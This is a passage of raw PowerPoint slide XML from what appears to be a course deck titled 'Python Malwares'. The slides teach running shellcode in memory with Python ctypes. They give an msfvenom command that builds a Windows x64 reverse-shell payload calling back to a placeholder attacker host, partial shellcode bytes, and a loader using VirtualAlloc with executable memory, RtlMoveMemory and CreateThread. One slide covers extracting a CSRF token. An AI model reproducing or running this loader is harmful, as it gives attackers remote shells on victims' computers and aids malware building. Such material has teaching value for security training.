          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34003868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196387" y="177296"/>
            <a:ext cx="3942350" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Python Malwares</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Running Shellcode With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ctypes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>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119</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8533449" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ctypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a library that can be used to call functions that are available in native DLL libraries (e.g., kernel32.dll)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It also provides a C compatible data types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ctypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module to execute any shellcode directly in memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ctypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to call functions located in Windows native libraries to copy and execute our shellcode in memory.</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First, we will create our script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>shellcode1.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ctypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02865681-D46D-47F5-8F63-7B3955B934AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676403" y="4307830"/>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ctypes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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279DE757-5703-4FF6-98AD-E06374FEF7F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="4872472"/>
            <a:ext cx="7807544"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 will create our shellcode using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C3C2B05-BE96-41C4-A976-AD66C322A5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676403" y="5351224"/>
            <a:ext cx="9821776" cy="95410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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -f python -p windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> LHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> LPORT=9999 -v shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode =  b""</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shellcode += b"\x6f\x6a\x00\x59\x41\x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xda</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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xd5"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FAC9BE8-FD90-4CED-9E2F-A83DF33575B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="6354246"/>
            <a:ext cx="6128084"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copy the generated shellcode into our script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="922432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Extracting values from responses</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08247" y="2458964"/>
            <a:ext cx="10137507" cy="280076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requests.get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g_res.text.find</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>103469</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g_res.text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103469</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103469</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>58</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'_token" value="ZCZ2fhMEINlV37uLSFrotniWQXIhXJtfooNtpR9G"&gt; '</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g_res.text.find</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g_res.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[token_index:token_index+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>58</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 value='</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'ZCZ2fhMEINlV37uLSFrotniWQXIhXJtfooNtpR9G'</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g_res.text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CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'ZCZ2fhMEINlV37uLSFrotniWQXIhXJtfooNtpR9G'</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token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g_res.text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extract values from responses:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0089F77-90FA-47BE-A821-77413E458FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051861" y="5068732"/>
            <a:ext cx="11140139" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This token we extracted is called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>CSRF token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>CSRF tokens are used to prevent attackers from “riding” the user’s session to perform unintended actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Tokens cannot be predicted. We need extract tokens every time we want to perform actions legitimately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4BE2FF-8381-4251-9D6F-42CF230B53A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29263190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196386" y="177296"/>
            <a:ext cx="5502445" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Python Malwares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66588" y="1098219"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Running Shellcode With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ctypes</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120</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00837" y="1559884"/>
            <a:ext cx="8533449" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we define our main function:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BEC03B-16B8-4EE5-AEE8-93F5E6D3F9CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1712499" y="1958819"/>
            <a:ext cx="9821776" cy="48705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350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ctypes.windll.kernel32.VirtualAlloc.restype = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ctypes.c_void_p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ctypes.windll.kernel32.VirtualAlloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ctypes.c_void_p</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err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(shellcode)),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569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3000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569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1350" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ctypes.create_string_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1350" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ctypes.windll.kernel32.RtlMoveMemory(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ctypes.c_void_p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</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buf</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err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(shellcode)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1350" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ctypes.windll.kernel32.CreateThread(</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ctypes.c_void_p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</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ctypes.c_void_p</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 </a:t>
            </a:r>
          </a:p>
          <a:p>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ctypes.pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
